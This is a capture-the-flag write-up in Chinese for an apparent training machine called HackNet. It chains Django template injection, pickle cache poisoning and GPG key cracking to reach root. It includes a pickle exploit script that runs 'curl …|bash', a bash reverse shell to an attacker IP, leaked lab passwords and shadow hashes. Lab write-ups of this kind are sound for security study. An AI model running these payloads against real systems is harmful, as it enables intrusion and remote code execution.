基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 19:04 JST
Nmap scan report for 10.10.11.85
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
|   256 95:62:ef:97:31:82:ff:a1:c6:08:01:8c:6a:0f:dc:1c (ECDSA)
|_  256 5f:bd:93:10:20:70:e6:09:f1:ba:6a:43:58:86:42:66 (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Did not follow redirect to http://hacknet.htb/
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.84 seconds

80

需要加hosts:

1
10.10.11.85 hacknet.htb

HackNet

随意注册登录:

SSTI

初始向量藏的有点深,Django SSTI,使用payload作为用户名后进行特定操作才会触发:

1
2
{{users}}
{{users.values}}

修改用户名后点赞任意post,然后再去获取对应post的likes,触发SSTI:

deepdive

需要获取的中间用户是deepdive,找到一个他点赞的post,例如post id 15:

1
2
3
deepdive@hacknet.htb
deepdive
D33pD!v3r

backdoor_bandit

用deepdive的账号登录,发现好友列表里的backdoor_bandit:

backdoor_bandit给deepdive的profile点过赞,但不能直接更改deepdive的用户名,所以用deepdive添加我们的账号为好友后再通过SSTI去获取:

1
2
3
mikey@hacknet.htb
backdoor_bandit
mYd4rks1dEisH3re

user flag

得到的mikey ssh登录:

Django cache to sandy

当在web上搜索或者explore后,会出现一些django cache:

django的cache就是pickle,所以修改替换:

1
2
3
4
5
6
7
8
# index.html
/bin/bash -i >& /dev/tcp/10.10.14.30/4444 0>&1

python3 exp.py

gASVMAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBVjdXJsIDEwLjEwLjE0LjMwfGJhc2iUhZRSlC4=

mikey@hacknet:/var/tmp/django_cache$ for i in $(ls); do rm -f $i;  echo 'gASVMAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBVjdXJsIDEwLjEwLjE0LjMwfGJhc2iUhZRSlC4=' |base64 -d> $i; chmod 777 $i; done

然后再次加载相应页面触发缓存中的代码执行,得到sandy:

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
import pickle
import base64

# Exploit object
class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ("curl 10.10.14.30|bash",),)


payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload)

gpg

sandy目录里可以找到一个armored_key.asc:

backups里也可以得到几个gpg加密的sql:

所以先破解出gpg key密码:

1
2
3
4
5
gpg2john armored_key.asc > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=gpg

sweetheart

backup02.sql.gpg

然后就是gpg破解,在backup02里可以找到一个密码,就是root 密码:

1
2
3
4
gpg --import armored_key.asc
gpg --output backup02.sql --decrypt backup02.sql.gpg

h4ck3rs4re3veRywh3re99

root flag

得到的密码切换到root即可:

shadow

1
2
3
root:$y$j9T$eErHv1Ni5SMAxSFoqTEr50$xWrccq.2xlr5SK8EVQJirlRcjFhiJ2ZR7/qffCp4JX1:19874:0:99999:7:::
mikey:$y$j9T$xbgiDokk.SkF6LfxRj17s.$97Ppf4gQ3MVuwiqUPLOox4IAaSRwbB/ZCx0XQYsD8r9:19874:0:99999:7:::
sandy:$y$j9T$VYCki/awnyWb6fcUoC0wt0$F2m2BtdGa9d9lUJn3SucfnXFM/yXNhzF8hHZSW65eUB:19907:0:99999:7:::

参考资料